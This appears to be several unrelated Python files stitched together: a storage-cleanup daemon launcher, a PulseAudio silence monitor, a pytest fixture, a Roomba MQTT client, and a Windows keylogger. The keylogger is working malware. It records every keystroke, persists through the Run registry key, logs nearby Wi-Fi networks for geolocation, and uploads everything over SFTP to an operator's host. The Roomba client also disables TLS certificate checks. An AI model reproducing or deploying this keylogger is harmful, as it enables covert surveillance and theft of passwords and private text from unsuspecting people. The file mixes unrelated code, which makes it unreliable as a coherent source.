def run(total_workers=1, chunk_size=100, threads_per_worker=None, once=False, greedy=False, rses=[], scheme=None, exclude_rses=None, include_rses=None, delay_seconds=0):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param threads_per_worker: Total number of threads created by each worker.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
"""
logging.info('main: starting processes')
rses_list = rse_core.list_rses()
if rses:
rses = [rse for rse in rses_list if rse['rse'] in rses]
else:
rses = rses_list
if exclude_rses:
excluded_rses = parse_expression(exclude_rses)
rses = [rse for rse in rses if rse not in excluded_rses]
if include_rses:
included_rses = parse_expression(include_rses)
rses = [rse for rse in rses if rse in included_rses]
logging.info('Reaper: This instance will work on RSEs: ' + ', '.join([rse['rse'] for rse in rses]))
threads = []
nb_rses_per_worker = int(math.ceil(len(rses) / float(total_workers))) or 1
rses = random.sample(rses, len(rses))
for worker in xrange(total_workers):
for child in xrange(threads_per_worker or 1):
rses_list = rses[worker * nb_rses_per_worker: worker * nb_rses_per_worker + nb_rses_per_worker]
if not rses_list:
logging.warning('Reaper: Empty RSEs list for worker %(worker)s' % locals())
continue
kwargs = {'worker_number': worker,
'child_number': child + 1,
'total_children': threads_per_worker or 1,
'once': once,
'chunk_size': chunk_size,
'greedy': greedy,
'rses': rses_list,
'delay_seconds': delay_seconds,
'scheme': scheme}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, child: %s' % (worker, child + 1)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
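# Editor's note: a hedged sketch (not part of the original daemon) of how a small
# launcher might drive run() and stop(); the real daemon is normally started from
# its own command-line entry point, and the worker/thread counts below are
# arbitrary example values.
def _example_launcher():
    import signal
    signal.signal(signal.SIGTERM, stop)   # request a graceful stop on SIGTERM
    signal.signal(signal.SIGINT, stop)    # ...and on Ctrl-C
    run(total_workers=2, threads_per_worker=2, chunk_size=100,
        greedy=False, once=False, delay_seconds=0)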
|
windowsKeylogger.py
|
'''
This is the windows version of our simplePythonKeylogger. It records keystrokes using pyHook, stores
them in a file called keylogs.txt and transmits back over ssh or email/cloud.
Exit by: <backspace><delete><backspace><delete>
Keylogs are sent when the keylog file reaches 5MB
'''
from sys import exit as sysExit
from sys import argv
from pyHook import HookManager
import pythoncom
import paramiko # For SSH
import os
import threading
import datetime
import json
import socket # To get hostname
from win32event import CreateMutex
from win32api import GetLastError
from winerror import ERROR_ALREADY_EXISTS
from _winreg import SetValueEx, OpenKey, HKEY_CURRENT_USER, KEY_ALL_ACCESS, REG_SZ # For registry
from Tkinter import Frame, Tk, Button # For GUI
import wifiGrab
data = '' # To hold logged key
exitStack = []
hostAddress = '<YOUR IP ADDRESS>'
keylogsFile='keylogs.txt'
wifiLogsFile='wifiLogs.txt'
sshServerUsername = '<YOUR USERNAME>'
sshServerPassword = '<YOUR PASSWORD>'
root = Tk() # Tk Object
def writeWifi(): # To get SSIDs of the wifi in the vicinity for geolocation
f = open(wifiLogsFile, 'a+')
t = wifiGrab.getWifi()
f.write(str(datetime.datetime.now()) + '\n')
json.dump(t, f, indent=4) # write json to file
f.write('\n\n\n')
f.close()
def addToStartup(): # Add this to startup
dirPath = os.getcwd()
progName = argv[0].split("\\")[-1]
dirPath = dirPath + '\\' + progName
keyValue = r'Software\Microsoft\Windows\CurrentVersion\Run'
currentKey = OpenKey(HKEY_CURRENT_USER, keyValue, 0, KEY_ALL_ACCESS)
SetValueEx(currentKey, "keylogger", 0, REG_SZ, dirPath)
def sendFile():
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostAddress, username=sshServerUsername, password=sshServerPassword)
sftp = client.open_sftp()
hostname = socket.gethostname() # Add hostname to our log file
sftp.put(keylogsFile, '/home/eschatonic/Desktop/upload/keylogs-' + hostname + '-' + str(datetime.datetime.today())[0:19] + '.txt')
sftp.put(wifiLogsFile, '/home/eschatonic/Desktop/upload/wifiLogs-' + hostname + '-' + str(datetime.datetime.today())[0:19] + '.txt')
        with open(keylogsFile, 'w'), open(wifiLogsFile, 'w'): # Clear both log files after upload
            pass
except Exception, e:
print e
# TODO email/cloud option to send log files
def writeKeylogs():
global data
try:
# TODO Find a way to encrypt data
f = open(keylogsFile, 'a+')
f.write(data)
f.close()
except Exception, e:
print str(e)
return
class keylogger():
def __init__(self):
'''
        Disallow multiple instances. Source: ajinabraham / Xenotix-Python-Keylogger
'''
self.mutex = CreateMutex(None, 1, 'mutex_var_xboz')
if GetLastError() == ERROR_ALREADY_EXISTS:
self.mutex = None
print "Multiple Instance not Allowed"
sysExit(0)
addToStartup() # Add to startup
writeWifi()
writeKeylogs() # Create keylogs.txt in case it does not exist
self.hooks_manager = HookManager() # Create a hook
self.hooks_manager.KeyDown = self.OnKeyBoardEvent # Assign keydown event handler
self.hooks_manager.HookKeyboard() # assign hook to the keyboard
pythoncom.PumpMessages()
def OnKeyBoardEvent(self, event): # This function is called when a key is pressed
global timeNow
global data
global exitStack
global keyLength
global wifiLogsFile
global keylogsFile
# logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
# logging.log(10,chr(event.Ascii))
if event.Ascii == 8:
key = '<BACKSPACE>'
        elif event.Ascii == 13: # Carriage return representation
key = '<ENTER>'
elif event.Ascii == 9: # TAB Representation
key = '<TAB>'
else:
key = chr(event.Ascii)
data += key
if event.Ascii == 8:
exitStack.append(event.Ascii)
elif event.Ascii == 0:
exitStack.append(event.Ascii)
else:
exitStack = []
if len(exitStack) == 4:
            if exitStack[0] == 8 and exitStack[1] == 0 and exitStack[2] == 8 and exitStack[3] == 0: # If last four values entered were <back><del><back><del>
                self.createExitGui() # spawn a quit dialog box
else:
exitStack = []
        if len(data) == 128: # Write data in chunks of 128 bytes
writeKeylogs()
data = ''
        if os.path.getsize(keylogsFile) >= 5e+6: # Send log file when it reaches 5MB
            t = threading.Thread(target=sendFile, args=()) # pass the function itself, don't call it here
t.start()
return True
def createExitGui(self):
app = self.Application(root) # Passing Tk object to our GUI implementation class
        app.mainloop()
        root.destroy()
sysExit(1)
class Application(Frame): # Class for implementation of exitGui
def CreateWidgets(self):
self.QUIT = Button(self)
self.QUIT["text"] = "QUIT"
self.QUIT["fg"] = "red"
self.QUIT["command"] = self.quit
self.QUIT.pack({"side": "left"})
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
self.CreateWidgets()
|
SoundPulseAudio.py
|
import os
import re
import struct
import subprocess
import threading
import time
import pyaudio
silence_loop = 0
sample_duration_sec = 0.1
timeout_duration_sec = 0.1
silence_duration_sec = 0
tmp_file = '/tmp/randomame.sound'
running = True
monitor_silence_thread = None
def monitor_silence():
global silence_loop
silence_loop = 0
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
while running is True:
stream.start_stream()
byte_array = stream.read(CHUNK)
stream.stop_stream()
count = int(len(byte_array) / 2)
if count >= 1024:
integers = struct.unpack('h' * count, byte_array)
is_sound = False
if len(integers) > 63:
first = integers[64]
first_max = first * 1.1
first_min = first * 0.9
integers_max = max(first_min, first_max)
integers_min = min(first_min, first_max)
for i in range(65, len(integers)):
if integers[i] > integers_max or integers[i] < integers_min:
is_sound = True
break
global silence_duration_sec
if is_sound is False:
silence_duration_sec += sample_duration_sec + timeout_duration_sec
else:
silence_duration_sec = 0
time.sleep(timeout_duration_sec)
def init():
print('Warning ! For smart sound to work, make sure that your default (a.k.a. fallback) "Input device" in PulseAudio\'s configuration is your output device\'s "monitor"')
global monitor_silence_thread
monitor_silence_thread = threading.Thread(target=monitor_silence)
monitor_silence_thread.start()
def get_silence_duration_sec():
global silence_duration_sec
return silence_duration_sec
def reset():
global silence_duration_sec
silence_duration_sec = 0
def kill():
global running
running = False
global monitor_silence_thread
if monitor_silence_thread is not None:
monitor_silence_thread.join()
def set_process_volume(pid, volume):
stream_index = get_stream_index(pid)
if stream_index is not None:
command = 'pactl set-sink-input-volume ' + str(stream_index) + " " + str(volume) + "%"
os.system(command)
def set_mute(pid, is_mute):
stream_index = get_stream_index(pid)
if stream_index is not None:
if is_mute is True:
param = '1'
else:
param = '0'
command = 'pactl set-sink-input-mute ' + str(stream_index) + " " + param
os.system(command)
if is_mute is False:
set_process_volume(pid, 100)
def get_stream_index(input_pid):
out = subprocess.Popen(['pactl', 'list', 'sink-inputs'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
sout, serr = out.communicate()
paragraphs = re.split('\n\n', sout.decode("utf-8"))
for p in paragraphs:
pid_txt = re.search('application.process.id(.+?)\n', p)
if pid_txt is not None:
pid = pid_txt.group(1).split('"')
if int(pid[1]) == input_pid:
stream_txt = re.search('Sink Input(.+?)\n', p)
if stream_txt is not None:
stream = stream_txt.group(1).split('#')
return int(stream[1])
return None
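# Editor's note: a minimal usage sketch (not part of the original module). init()
# starts the background capture thread; every loop that detects no sound adds
# sample_duration_sec + timeout_duration_sec (0.2 s with the defaults above) to the
# reported silence duration. The 5-second threshold below is an arbitrary example.
def _example_silence_watch():
    init()
    try:
        while True:
            if get_silence_duration_sec() >= 5:
                print('roughly 5 seconds of silence detected')
                reset()
            time.sleep(0.5)
    except KeyboardInterrupt:
        kill()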
|
conftest.py
|
from multiprocessing import Process
from .. import server
import pytest
@pytest.fixture(scope='session', autouse=True)
def server_setup():
instance = server.create_server()
process = Process(target=instance.serve_forever)
process.daemon = True
process.start()
|
roomba.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Python 2.7/Python 3.5/3.6 (thanks to pschmitt for adding Python 3 compatibility)
Program to connect to Roomba 980 vacuum cleaner, decode json, and forward to mqtt
server
Nick Waterton 24th April 2017: V 1.0: Initial Release
Nick Waterton 4th July 2017 V 1.1.1: Fixed MQTT protocol version, and map
paths, fixed paho-mqtt tls changes
Nick Waterton 5th July 2017 V 1.1.2: Minor fixes, CV version 3.2 support
Nick Waterton 7th July 2017 V1.2.0: Added -o option "roomOutline" allows
enabling/disabling of room outline drawing, added auto creation of css/html files
Nick Waterton 11th July 2017 V1.2.1: Quick (untested) fix for room outlines
if you don't have OpenCV
Nick Waterton 3rd Feb 2018 V1.2.2: Quick (untested) fix for running directly (ie not installed)
Nick Waterton 12th April 2018 V1.2.3: Fixed image rotation bug causing distorted maps if map rotation was not 0.
Nick Waterton 21st Dec 2018 V1.2.4: Fixed problem with findContours with OpenCV V4. Note V4.0.0-alpha still returns 3 values, and so won't work.
'''
from __future__ import print_function
from __future__ import absolute_import
__version__ = "1.2.4"
from ast import literal_eval
from collections import OrderedDict, Mapping
try:
from roomba.password import Password
except ImportError:
from password import Password
import datetime
import json
import math
import logging
import os
import six
import socket
import ssl
import sys
import threading
import time
import traceback
try:
import configparser
except:
from six.moves import configparser
# Import trickery
global HAVE_CV2
global HAVE_MQTT
global HAVE_PIL
HAVE_CV2 = False
HAVE_MQTT = False
HAVE_PIL = False
try:
import paho.mqtt.client as mqtt
HAVE_MQTT = True
except ImportError:
print("paho mqtt client not found")
try:
import cv2
import numpy as np
HAVE_CV2 = True
except ImportError:
print("CV or numpy module not found, falling back to PIL")
# NOTE: MUST use Pillow Pillow 4.1.1 to avoid some horrible memory leaks in the
# text handling!
try:
from PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageOps
HAVE_PIL = True
except ImportError:
print("PIL module not found, maps are disabled")
# On Python 3 raw_input was renamed to input
try:
input = raw_input
except NameError:
pass
class Roomba(object):
'''
This is a Class for Roomba 900 series WiFi connected Vacuum cleaners
Requires firmware version 2.0 and above (not V1.0). Tested with Roomba 980
username (blid) and password are required, and can be found using the
password() class above (or can be auto discovered)
Most of the underlying info was obtained from here:
https://github.com/koalazak/dorita980 many thanks!
    The values received from the Roomba are stored in a dictionary called
master_state, and can be accessed at any time, the contents are live, and
will build with time after connection.
This is not needed if the forward to mqtt option is used, as the events will
be decoded and published on the designated mqtt client topic.
'''
VERSION = "1.0"
states = {"charge": "Charging",
"new": "New Mission",
"run": "Running",
"resume": "Running",
"hmMidMsn": "Recharging",
"recharge": "Recharging",
"stuck": "Stuck",
"hmUsrDock": "User Docking",
"dock": "Docking",
"dockend": "Docking - End Mission",
"cancelled": "Cancelled",
"stop": "Stopped",
"pause": "Paused",
"hmPostMsn": "End Mission",
"": None}
# From http://homesupport.irobot.com/app/answers/detail/a_id/9024/~/roomba-900-error-messages
_ErrorMessages = {
0: "None",
1: "Roomba is stuck with its left or right wheel hanging down.",
2: "The debris extractors can't turn.",
5: "The left or right wheel is stuck.",
6: "The cliff sensors are dirty, it is hanging over a drop, "\
"or it is stuck on a dark surface.",
8: "The fan is stuck or its filter is clogged.",
9: "The bumper is stuck, or the bumper sensor is dirty.",
10: "The left or right wheel is not moving.",
11: "Roomba has an internal error.",
14: "The bin has a bad connection to the robot.",
15: "Roomba has an internal error.",
16: "Roomba has started while moving or at an angle, or was bumped "\
"while running.",
17: "The cleaning job is incomplete.",
18: "Roomba cannot return to the Home Base or starting position."
}
def __init__(self, address=None, blid=None, password=None, topic="#",
continuous=True, clean=False, cert_name="", roombaName="",
file="./config.ini"):
'''
address is the IP address of the Roomba, the continuous flag enables a
continuous mqtt connection, if this is set to False, the client connects
and disconnects every 'delay' seconds (1 by default, but can be
changed). This is to allow other programs access, as there can only be
one Roomba connection at a time.
        As cloud connections are unaffected, I recommend leaving this as True.
leave topic as is, unless debugging (# = all messages).
if a python standard logging object exists, it will be used for logging.
'''
self.debug = False
self.log = logging.getLogger("roomba.__main__") #modified to work with new scheme NW 15/9/2017
#self.log = logging.getLogger(__name__+'.Roomba')
if self.log.getEffectiveLevel() == logging.DEBUG:
self.debug = True
self.address = address
if not cert_name:
self.cert_name = "/etc/ssl/certs/ca-certificates.crt"
else:
self.cert_name = cert_name
self.continuous = continuous
if self.continuous:
self.log.info("CONTINUOUS connection")
else:
self.log.info("PERIODIC connection")
# set the following to True to enable pretty printing of json data
self.pretty_print = False
self.stop_connection = False
self.periodic_connection_running = False
self.clean = clean
self.roomba_port = 8883
self.blid = blid
self.password = password
self.roombaName = roombaName
self.topic = topic
self.mqttc = None
self.exclude = ""
self.delay = 1
self.roomba_connected = False
self.indent = 0
self.master_indent = 0
self.raw = False
self.drawmap = False
self.previous_co_ords = self.co_ords = self.zero_coords()
self.fnt = None
self.home_pos = None
self.angle = 0
self.cleanMissionStatus_phase = ""
self.previous_cleanMissionStatus_phase = ""
self.current_state = None
self.last_completed_time = None
self.bin_full = False
self.base = None #base map
self.dock_icon = None #dock icon
self.roomba_icon = None #roomba icon
self.roomba_cancelled_icon = None #roomba cancelled icon
self.roomba_battery_icon = None #roomba battery low icon
self.roomba_error_icon = None #roomba error icon
self.bin_full_icon = None #bin full icon
self.room_outline_contour = None
self.room_outline = None
self.transparent = (0, 0, 0, 0) #transparent
self.previous_display_text = self.display_text = None
self.master_state = {}
self.time = time.time()
self.update_seconds = 300 #update with all values every 5 minutes
self.show_final_map = True
self.client = None
if self.address is None or blid is None or password is None:
self.read_config_file(file)
def read_config_file(self, file="./config.ini"):
#read config file
Config = configparser.ConfigParser()
try:
Config.read(file)
except Exception as e:
self.log.warn("Error reading config file %s" %e)
self.log.info("No Roomba specified, and no config file found - "
"attempting discovery")
if Password(self.address, file):
return self.read_config_file(file)
else:
return False
self.log.info("reading info from config file %s" % file)
addresses = Config.sections()
if self.address is None:
if len(addresses) > 1:
self.log.warn("config file has entries for %d Roombas, "
"only configuring the first!")
self.address = addresses[0]
        self.blid = Config.get(self.address, "blid")
self.password = Config.get(self.address, "password")
# self.roombaName = literal_eval(
# Config.get(self.address, "data"))["robotname"]
return True
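    # Editor's note: an illustrative helper (not part of the original class) showing
    # the config.ini layout read_config_file() expects: one section per Roomba keyed
    # by its IP address, containing at least "blid" and "password". All values below
    # are placeholders.
    @staticmethod
    def _write_example_config(file="./config.ini"):
        Config = configparser.ConfigParser()
        Config.add_section("192.168.1.100")
        Config.set("192.168.1.100", "blid", "0123456789ABCDEF")
        Config.set("192.168.1.100", "password", ":1:1486937829:examplepassword")
        with open(file, "w") as f:
            Config.write(f)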
def setup_client(self):
if self.client is None:
if not HAVE_MQTT:
print("Please install paho-mqtt 'pip install paho-mqtt' "
"to use this library")
return False
self.client = mqtt.Client(
client_id=self.blid, clean_session=self.clean,
protocol=mqtt.MQTTv311)
# Assign event callbacks
self.client.on_message = self.on_message
self.client.on_connect = self.on_connect
self.client.on_publish = self.on_publish
self.client.on_subscribe = self.on_subscribe
self.client.on_disconnect = self.on_disconnect
# Uncomment to enable debug messages
# client.on_log = self.on_log
# set TLS, self.cert_name is required by paho-mqtt, even if the
# certificate is not used...
# but v1.3 changes all this, so have to do the following:
self.log.info("Setting TLS")
try:
self.client.tls_set(
self.cert_name, cert_reqs=ssl.CERT_NONE,
tls_version=ssl.PROTOCOL_TLSv1)
except (ValueError, FileNotFoundError): # try V1.3 version
self.log.warn("TLS Setting failed - trying 1.3 version")
self.client._ssl_context = None
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_NONE
context.load_default_certs()
self.client.tls_set_context(context)
except:
self.log.error("Error setting TLS: %s" % traceback.format_exc())
# disables peer verification
self.client.tls_insecure_set(True)
self.client.username_pw_set(self.blid, self.password)
self.log.info("Setting TLS - OK")
return True
return False
def connect(self):
if self.address is None or self.blid is None or self.password is None:
self.log.critical("Invalid address, blid, or password! All these "
"must be specified!")
sys.exit(1)
if self.roomba_connected or self.periodic_connection_running: return
if self.continuous:
if not self._connect():
if self.mqttc is not None:
self.mqttc.disconnect()
sys.exit(1)
else:
self._thread = threading.Thread(target=self.periodic_connection)
self._thread.daemon = True
self._thread.start()
self.time = time.time() #save connect time
def _connect(self, count=0, new_connection=False):
max_retries = 3
try:
if self.client is None or new_connection:
self.log.info("Connecting %s" % self.roombaName)
self.setup_client()
self.client.connect(self.address, self.roomba_port, 60)
else:
self.log.info("Attempting to Reconnect %s" % self.roombaName)
self.client.loop_stop()
self.client.reconnect()
self.client.loop_start()
return True
except Exception as e:
self.log.error("Error: %s " % e)
exc_type, exc_obj, exc_tb = sys.exc_info()
# self.log.error("Exception: %s" % exc_type)
# if e[0] == 111: #errno.ECONNREFUSED - does not work with
# python 3.0 so...
if exc_type == socket.error or exc_type == ConnectionRefusedError:
count += 1
if count <= max_retries:
self.log.error("Attempting new Connection# %d" % count)
time.sleep(1)
self._connect(count, True)
if count == max_retries:
self.log.error("Unable to connect %s" % self.roombaName)
return False
def disconnect(self):
if self.continuous:
self.client.disconnect()
else:
self.stop_connection = True
def periodic_connection(self):
# only one connection thread at a time!
if self.periodic_connection_running: return
self.periodic_connection_running = True
while not self.stop_connection:
if self._connect():
time.sleep(self.delay)
self.client.disconnect()
time.sleep(self.delay)
self.client.disconnect()
self.periodic_connection_running = False
def on_connect(self, client, userdata, flags, rc):
self.log.info("Roomba Connected %s" % self.roombaName)
if rc == 0:
self.roomba_connected = True
self.client.subscribe(self.topic)
else:
self.log.error("Roomba Connected with result code " + str(rc))
self.log.error("Please make sure your blid and password are "
"correct %s" % self.roombaName)
if self.mqttc is not None:
self.mqttc.disconnect()
sys.exit(1)
def on_message(self, mosq, obj, msg):
# print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
if self.exclude != "":
if self.exclude in msg.topic:
return
if self.indent == 0:
self.master_indent = max(self.master_indent, len(msg.topic))
log_string, json_data = self.decode_payload(msg.topic,msg.payload)
self.dict_merge(self.master_state, json_data)
if self.pretty_print:
self.log.info("%-{:d}s : %s".format(self.master_indent)
% (msg.topic,log_string))
else:
self.log.info("Received Roomba Data %s: %s, %s"
% (self.roombaName, str(msg.topic), str(msg.payload)))
if self.raw:
self.publish(msg.topic, msg.payload)
else:
self.decode_topics(json_data)
# default every 5 minutes
if time.time() - self.time > self.update_seconds:
self.log.info("Publishing master_state %s" % self.roombaName)
self.decode_topics(self.master_state) # publish all values
self.time = time.time()
def on_publish(self, mosq, obj, mid):
pass
def on_subscribe(self, mosq, obj, mid, granted_qos):
self.log.debug("Subscribed: %s %s" % (str(mid), str(granted_qos)))
def on_disconnect(self, mosq, obj, rc):
self.roomba_connected = False
if rc != 0:
self.log.warn("Unexpected Disconnect From Roomba %s! - reconnecting"
% self.roombaName)
else:
self.log.info("Disconnected From Roomba %s" % self.roombaName)
def on_log(self, mosq, obj, level, string):
self.log.info(string)
def set_mqtt_client(self, mqttc=None, brokerFeedback=""):
self.mqttc = mqttc
if self.mqttc is not None:
if self.roombaName != "":
self.brokerFeedback = brokerFeedback + "/" + self.roombaName
else:
self.brokerFeedback = brokerFeedback
def send_command(self, command):
self.log.info("Received COMMAND: %s" % command)
Command = OrderedDict()
Command["command"] = command
Command["time"] = self.totimestamp(datetime.datetime.now())
Command["initiator"] = "localApp"
myCommand = json.dumps(Command)
self.log.info("Publishing Roomba Command : %s" % myCommand)
self.client.publish("cmd", myCommand)
def set_preference(self, preference, setting):
self.log.info("Received SETTING: %s, %s" % (preference, setting))
val = False
if setting.lower() == "true":
val = True
tmp = {preference: val}
Command = {"state": tmp}
myCommand = json.dumps(Command)
self.log.info("Publishing Roomba Setting : %s" % myCommand)
self.client.publish("delta", myCommand)
def publish(self, topic, message):
if self.mqttc is not None and message is not None:
self.log.debug("Publishing item: %s: %s"
% (self.brokerFeedback + "/" + topic, message))
self.mqttc.publish(self.brokerFeedback + "/" + topic, message)
def set_options(self, raw=False, indent=0, pretty_print=False):
self.raw = raw
self.indent = indent
self.pretty_print = pretty_print
if self.raw:
self.log.info("Posting RAW data")
else:
self.log.info("Posting DECODED data")
def enable_map(self, enable=False, mapSize="(800,1500,0,0,0,0)",
mapPath=".", iconPath = "./", roomOutline=True,
enableMapWithText=True,
fillColor="lawngreen",
outlineColor=(64,64,64,255),
outlineWidth=1,
home_icon_file="home.png",
roomba_icon_file="roomba.png",
roomba_error_file="roombaerror.png",
roomba_cancelled_file="roombacancelled.png",
roomba_battery_file="roomba-charge.png",
bin_full_file="binfull.png",
roomba_size=(50,50), draw_edges = 30, auto_rotate=True):
'''
Enable live map drawing. mapSize is x,y size, x,y offset of docking
station ((0,0) is the center of the image) final value is map rotation
(in case map is not straight up/down). These values depend on the
size/shape of the area Roomba covers. Offset depends on where you place
the docking station. This will need some experimentation to get right.
You can supply 32x32 icons for dock and roomba etc. If the files don't
exist, crude representations are made. If you specify home_icon_file as
None, then no dock is drawn. Draw edges attempts to draw straight lines
around the final (not live) map, and Auto_rotate (on/off) attempts to
line the map up vertically. These only work if you have openCV
installed; otherwise a PIL version is used, which is not as good (but
less CPU intensive). roomOutline enables the previous largest saved
outline to be overlaid on the map (so you can see where cleaning was
missed). This is on by default, but the alignment doesn't work so well,
so you can turn it off.
Returns map enabled True/False
'''
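# Illustrative call (a sketch only, assuming myroomba is an instance of this
# class - sizes, offsets and paths are placeholders that depend entirely on
# your floorplan and docking station position):
#   myroomba.enable_map(enable=True, mapSize="(800,1500,0,0,0,0)",
#                       mapPath="/tmp", iconPath="./res", roomOutline=False)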
if not HAVE_PIL: #can't draw a map without PIL!
return False
if Image.PILLOW_VERSION < "4.1.1":
print("WARNING: PIL version is %s, this is not the latest! you "
"can get bad memory leaks with old versions of PIL"
% Image.PILLOW_VERSION)
print("run: 'pip install --upgrade pillow' to fix this")
self.drawmap = enable
if self.drawmap:
self.log.info("MAP: Maps Enabled")
self.mapSize = literal_eval(mapSize)
if len(self.mapSize) < 6:
self.log.error("mapSize is required, and is of the form "
"(800,1500,0,0,0,0) - (x,y size, x,y dock loc, "
"theta1, theta2) - map, roomba rotation")
self.drawmap = False
return False
self.angle = self.mapSize[4]
self.roomba_angle = self.mapSize[5]
self.mapPath = mapPath
if home_icon_file is None:
self.home_icon_file = None
else:
self.home_icon_file = os.path.join(iconPath, home_icon_file)
self.roomba_icon_file = os.path.join(iconPath, roomba_icon_file)
self.roomba_error_file = os.path.join(iconPath, roomba_error_file)
self.roomba_cancelled_file = os.path.join(iconPath, roomba_cancelled_file)
self.roomba_battery_file = os.path.join(iconPath, roomba_battery_file)
self.bin_full_file = os.path.join(iconPath, bin_full_file)
self.draw_edges = draw_edges / 10000  # e.g. 30 -> 0.003, used as a fraction of the perimeter
self.auto_rotate = auto_rotate
if not roomOutline:
self.log.info("MAP: Not drawing Room Outline")
self.roomOutline = roomOutline
self.enableMapWithText = enableMapWithText
self.fillColor = fillColor
self.outlineColor = outlineColor
self.outlineWidth = outlineWidth
self.initialise_map(roomba_size)
return True
return False
def totimestamp(self, dt):
td = dt - datetime.datetime(1970, 1, 1)
return int(td.total_seconds())
def dict_merge(self, dct, merge_dct):
""" Recursive dict merge. Inspired by :meth:``dict.update()``, instead
of updating only top-level keys, dict_merge recurses down into dicts
nested to an arbitrary depth, updating keys. The ``merge_dct`` is
merged into ``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k, v in six.iteritems(merge_dct):
if (k in dct and isinstance(dct[k], dict)
and isinstance(merge_dct[k], Mapping)):
self.dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
def decode_payload(self, topic, payload):
'''
Format json for pretty printing, return string suitable for logging,
and a dict of the json data
'''
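# Illustrative example: a payload of b'{"state": {"reported": {"batPct": 100}}}'
# yields an indented "Decoded JSON: ..." string for logging plus a dict of the
# same data; payloads that are not valid JSON fall through to the ValueError
# branch below.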
indent = self.master_indent + 31 #number of spaces to indent json data
try:
# if it's json data, decode it (use OrderedDict to preserve keys
# order), else return as is...
json_data = json.loads(
payload.decode("utf-8").replace(":nan", ":NaN").\
replace(":inf", ":Infinity").replace(":-inf", ":-Infinity"),
object_pairs_hook=OrderedDict)
# if it's not a dictionary, probably just a number
if not isinstance(json_data, dict):
return json_data, dict(json_data)
json_data_string = "\n".join((indent * " ") + i for i in \
(json.dumps(json_data, indent = 2)).splitlines())
formatted_data = "Decoded JSON: \n%s" % (json_data_string)
except ValueError:
formatted_data = payload
if self.raw:
formatted_data = payload
return formatted_data, dict(json_data)
def decode_topics(self, state, prefix=None):
'''
decode json data dict, and publish as individual topics to
brokerFeedback/topic. The keys are concatenated with _ to make one unique
topic name. Strings are expressly converted to str to avoid unicode
representations.
'''
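# Illustrative example: after the "state_reported_" prefix is stripped below,
# {"cleanMissionStatus": {"phase": "run"}} ends up published as topic
# "cleanMissionStatus_phase" with the value "run".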
for k, v in six.iteritems(state):
if isinstance(v, dict):
if prefix is None:
self.decode_topics(v, k)
else:
self.decode_topics(v, prefix+"_"+k)
else:
if isinstance(v, list):
newlist = []
for i in v:
if isinstance(i, dict):
for ki, vi in six.iteritems(i):
newlist.append((str(ki), vi))
else:
if isinstance(i, six.string_types):
i = str(i)
newlist.append(i)
v = newlist
if prefix is not None:
k = prefix+"_"+k
# all data starts with this, so it's redundant
k = k.replace("state_reported_","")
# save variables for drawing map
if k == "pose_theta":
self.co_ords["theta"] = v
if k == "pose_point_x": #x and y are reversed...
self.co_ords["y"] = v
if k == "pose_point_y":
self.co_ords["x"] = v
if k == "bin_full":
self.bin_full = v
if k == "cleanMissionStatus_error":
try:
self.error_message = self._ErrorMessages[v]
except KeyError as e:
self.log.warn(
"Error looking up Roomba error message %s" % e)
self.error_message = "Unknown Error number: %d" % v
self.publish("error_message", self.error_message)
if k == "cleanMissionStatus_phase":
self.previous_cleanMissionStatus_phase = \
self.cleanMissionStatus_phase
self.cleanMissionStatus_phase = v
self.publish(k, str(v))
if prefix is None:
self.update_state_machine()
def update_state_machine(self, new_state = None):
'''
Roomba progresses through states (phases), current identified states
are:
"" : program started up, no state yet
"run" : running on a Cleaning Mission
"hmUsrDock" : returning to Dock
"hmMidMsn" : need to recharge
"hmPostMsn" : mission completed
"charge" : chargeing
"stuck" : Roomba is stuck
"stop" : Stopped
"pause" : paused
available states:
states = { "charge":"Charging",
"new":"New Mission",
"run":"Running",
"resume":"Running",
"hmMidMsn":"Recharging",
"recharge":"Recharging",
"stuck":"Stuck",
"hmUsrDock":"User Docking",
"dock":"Docking",
"dockend":"Docking - End Mission",
"cancelled":"Cancelled",
"stop":"Stopped",
"pause":"Paused",
"hmPostMsn":"End Mission",
"":None}
Normal Sequence is "" -> charge -> run -> hmPostMsn -> charge
Mid mission recharge is "" -> charge -> run -> hmMidMsn -> charge
-> run -> hmPostMsn -> charge
Stuck is "" -> charge -> run -> hmPostMsn -> stuck
-> run/charge/stop/hmUsrDock -> charge
Start program during run is "" -> run -> hmPostMsn -> charge
Need to identify a new mission to initialize map, and end of mission to
finalise map.
Assume charge -> run = start of mission (init map)
stuck - > charge = init map
Assume hmPostMsn -> charge = end of mission (finalize map)
Anything else = continue with existing map
'''
current_mission = self.current_state
#if self.current_state == None: #set initial state here for debugging
# self.current_state = self.states["recharge"]
# self.show_final_map = False
# deal with "bin full" timeout on mission
try:
if (self.master_state["state"]["reported"]["cleanMissionStatus"]["mssnM"] == "none" and
self.cleanMissionStatus_phase == "charge" and
(self.current_state == self.states["pause"] or
self.current_state == self.states["recharge"])):
self.current_state = self.states["cancelled"]
except KeyError:
pass
if (self.current_state == self.states["charge"] and
self.cleanMissionStatus_phase == "run"):
self.current_state = self.states["new"]
elif (self.current_state == self.states["run"] and
self.cleanMissionStatus_phase == "hmMidMsn"):
self.current_state = self.states["dock"]
elif (self.current_state == self.states["dock"] and
self.cleanMissionStatus_phase == "charge"):
